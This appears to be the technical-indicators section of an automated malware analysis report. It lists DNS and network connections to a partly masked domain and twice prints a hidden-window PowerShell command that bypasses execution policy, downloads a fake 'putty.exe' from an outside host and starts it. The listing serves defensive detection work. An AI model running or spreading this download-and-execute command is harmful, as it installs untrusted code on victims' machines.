Technical information
- http://testcenter.com.tr/file/putty.exe as %homepath%\vetlap.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://testcenter.com.tr/file/putty.exe','%USERPROFILE%\VETLAP.exe');Start-P...
- 'te####nter.com.tr':80
- 'te####nter.com.tr':443
- http://te####nter.com.tr/file/putty.exe
- 'te####nter.com.tr':443
- DNS ASK te####nter.com.tr
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://testcenter.com.tr/file/putty.exe','%USERPROFILE%\VETLAP.exe');Start-P...' (with a hidden window)